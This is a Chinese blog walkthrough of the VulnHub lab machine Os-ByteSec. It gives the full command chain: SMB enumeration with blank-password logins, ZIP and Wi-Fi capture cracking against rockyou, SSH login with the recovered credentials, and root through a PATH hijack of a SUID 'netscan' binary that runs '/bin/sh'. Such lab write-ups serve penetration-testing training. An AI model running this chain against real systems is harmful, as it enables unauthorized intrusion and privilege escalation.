Os-ByteSec

最新推荐文章于 2024-08-18 16:45:00 发布
最新推荐文章于 2024-08-18 16:45:00 发布
阅读量212 收藏
点赞数 4
分类专栏: vulnhub 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/134480469
版权
文章描述了一次针对192.168.80.144靶机的渗透测试过程,包括主机发现、端口扫描、信息收集,重点关注SMB服务的渗透、密码破解以及最终权限提升,展示了黑客可能使用的工具和技术如enum4linux和aircrack-ng。
摘要由CSDN通过智能技术生成

Os-ByteSec

一、主机发现和端口扫描

  • 主机发现,靶机地址192.168.80.144

    在这里插入图片描述

  • 端口扫描,开放了80、139、445、2525端口

    在这里插入图片描述

二、信息收集

  • 访问80端口

    在这里插入图片描述

  • 路径扫描

    dirsearch -u "http://192.168.80.144/" -e *

    在这里插入图片描述

  • 访问扫描出来的路径,没有发现有价值的信息

    http://192.168.80.144/css/         
http://192.168.80.144/gallery/    
http://192.168.80.144/html/                                    
http://192.168.80.144/img/        
http://192.168.80.144/index.html                                     
http://192.168.80.144/js/          
http://192.168.80.144/news/

  • 在网站下边发现了一个提示,是不是暗示着对SMB进行渗透

    在这里插入图片描述

三、SMB渗透

  • SMB是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,它允许应用程序和终端用户从远端的文件服务器访问文件资源

  • 查询靶机中的用户信息

    enum4linux -U 192.168.80.144

enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息

    在这里插入图片描述

  • 爆破用户smb密码,密码为空

    acccheck -t 192.168.80.144 -u smb -v

    在这里插入图片描述

  • 枚举靶机的共享资源

    smbmap -u 'smb' -p '' -H 192.168.80.144

    在这里插入图片描述

  • 查看靶机的共享目录

    smbclient -L 192.168.80.144 -U smb

    在这里插入图片描述

  • 通过SMB登录靶机

    smbclient //192.168.80.144/print$ -U smb

    在这里插入图片描述

  • 发现里面的文件全是0字节,但是发现了一个.目录,是不是指定smb用户的家目录呢,试一下

    smbclient //192.168.80.144/smb -U smb

    在这里插入图片描述

  • 发现两个文件,其中main文件只有一个hello

    在这里插入图片描述

  • 将另一个文件下载下来

    在这里插入图片描述

四、密码破解

  • 尝试解压safe.zip,发现需要密码,爆破密码

    fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

或者

zip2john safe.zip > pass
john pass

密码hacker1

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

  • 解压得到两个文件,secret.jpg和user.cap,图片没啥利用价值,使用wireshark打开user.cap文件进行分析,是个无线数据包,wifi名为blackjax,使用aircrack-ng破解user.cap文件,得到密码为snowflake

    aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

    在这里插入图片描述

五、权限提升

  • 使用刚才得到的用户名密码登录ssh,得到第一个flag

    blackjax:snowflake
ssh blackjax@192.168.80.144 -p 2525

    在这里插入图片描述

  • 该用户不能执行sudo

    在这里插入图片描述

  • 查看系统中带SUID的程序

    find / -user root -perm -4000 -print 2>/dev/null

    在这里插入图片描述

  • 其中netscan比较可疑,执行该命令

    在这里插入图片描述

  • 下载并分析该文件,发现它调用了execve函数执行了netstat -antp命令

    scp -P 2525 blackjax@192.168.80.144:/usr/bin/netscan /tmp

strace -f /tmp/netscan

    在这里插入图片描述

    在这里插入图片描述

  • 通过劫持环境变量来让netscan在执行时执行其他命令

    # tmp有写权限
echo "/bin/sh" > /tmp/netstat
chmod 777 /tmp/netstat
export PATH=/tmp:$PATH 
netscan

  • 提权成功

    在这里插入图片描述

果粒程1122
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机hackNos Os-Bytesec练习报告
黑战士的博客
05-21 1018
1. 之前只接触过windows下的smb漏洞,首次了linux下的smb的扫描和利用方式\2. 学习了suid的linux提权工具,多角度考虑提权方式,不要死磕一种方式。
HACKNOS_ OS-BYTESEC
LainWith的博客
01-09 1182
目录介绍信息收集主机发现网站探测目录扫描使用nmap漏扫 smb 服务SMBMap枚举Samba共享驱动器enum4linux枚举Sambasmbclient访问samba服务器爆破压缩包查看压缩包连接靶机第一个FlagSUID特权-第二个Flag参考 介绍 难度:中级 Flag : 2 Flag first user And second root Learning : exploit | SMB | Enumration | Stenography | Privilege Escalation 靶机地址
Vulnhub:Os-Bytesec靶机渗透
m0_62008601的博客
12-04 1124
基本的渗透过程以及linux下的PATH环境变量提权
vulnhub靶机 Os-ByteSec
witwitwiter的博客
08-29 419
vulnhub靶机 Os-ByteSec 靶机地址hackNos: Os-Bytesec ~ VulnHub 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 靶机网卡配置参考我之前的vulnhub靶机 Os-hackNos-1_witwitwiter的博客-CSDN博客 渗透测试 使用nmap进行端口扫描 └─# nmap -sV 192.168.5.135 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 19:
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 899
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-14 2256
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
08-18 1201
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
企业产品网络安全日志0815——TLS升级不易验,iOS加固易疏忽
KD的疯狂实验室
08-15 166
TLS升级不易验,iOS加固易疏忽
DC-4靶机渗透测试
weixin_58786230的博客
08-14 259
【代码】DC-4靶机渗透测试。
《密码编码学与网络安全原理与实践》第十四章第十五章密钥管理和用户认证
m0_57291352的博客
08-14 982
由于证书是CA签发的,每一个用户都需要拥有一份CA的公钥来验证签名,该公钥必须用一种绝对安全的方式提供给每个用户,使得用户可以信任该证书。当A获得相关证书后,可以通过顺序展开证书路径获得B的公钥,用这个公钥,A可将加密消息送往B,如果A想得到B返回的加密消息或对发往B的消息签名,则B需要按照下述证书路径获得A的公钥:Z>Y>V>W>X>一旦B拥有了A 的证书,B即可确信用A的公钥加密的消息是安全的,不可能被窃取;任何通信方可验证证书是真实的;
阿一网络安全实战演练之利用 REST URL 中的服务器端参数污染
Ayixy的博客
08-15 818
3. 将 username 参数的值从 administrator%3F 改为 ./administrator,然后发送请求。4. 将 username 参数的值从 ./administrator 改为 ../administrator,然后发送请求。这表明请求可能访问了一个无效的 URL 路径。2、 在 Proxy > HTTP history 中,注意到 POST /forgot-password 请求和相关的 /static/js/forgotPassword.js JavaScript 文件。
靶机:DC-4
weixin_52953960的博客
08-13 371
在 /var/mail 下有一封信,发现 charles 用户的密码。teehee是个小众的linux编辑器,执行以下命令,成功提权。查看 /etc/passwd 文件。sudo -l 看一下,不知道密码。在 jim 用户下发现密码文件。查看具有 root 权限的命令。访问80端口,发现登录页面。切换为交互式shell。使用 hydra 破解。bp抓包,是命令执行。
Hackademic.RTB1靶场实战【超详细】
weixin_68615160的博客
08-14 473
其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css。可以看到 wp-content 位置,尝试将其修改为 wordpress的默认路径wp-admin,发现后台登录页面。挨个登录,登录GeorgeMiller发现插件里面能直接修改php代码,我们添加phpinfo,发现成功解析。排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用。查看当前权限,发现需要密码。
文件包含漏洞(一)
2302_80280669的博客
08-14 413
文件包含漏洞,通常发生在Web应用程序中,特别是那些使用用户输入动态生成内容的部分。这种漏洞允许攻击者通过提交恶意的文件路径请求,使得服务器错误地读取并执行预定义之外的文件,包括但不限于脚本、配置文件甚至是系统命令。这可能导致未经授权的数据访问、修改或泄露,甚至可以被利用来进行远程代码执行。
网络安全】在403页面实现RCE
等风来
08-14 233
因此,在https://npmjs.com注册一个账号,然后发布名为Package123的包,其中包含可以反向Shell的代码,这样,就可以实现RCE。
vulnhub系列:Hackademic.RTB1
jq_j37的博客
08-13 336
vulnhub系列:Hackademic.RTB1靶机,打靶文章
windows压缩包爆破
08-13
要在Windows上进行压缩包的爆破,您可以使用工具rarcrack。rarcrack可以指定要爆破的文件类型,如rar、zip、7z,并可以定义最大长度等参数。它最大支持12线程来加速爆破过程。使用命令rarcrack [压缩包路径 -threads 12 -type [压缩包类型可以进行爆破操作。然而,需要注意的是,爆破过程可能需要一定的时间,并且并不保证一定能成功破解密码。有时候可能会出现没有结果或速度较慢的情况。另外,如果您需要爆破zip压缩包,您还可以使用工具fcrackzip。使用命令fcrackzip [压缩包路径可以进行zip压缩包的爆破。 [2] 引用 > [保存密码哈希的文件可以提取密码哈希。然后使用John the Ripper等工具进行破解。 [3<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [如何才能简洁高效不失优雅的爆破ZIP文件?](https://blog.csdn.net/zxsctf/article/details/131356650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOSOS-BYTESEC(压缩包爆破,无线爆破,环境变量...](https://blog.csdn.net/weixin_65527369/article/details/127443994)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值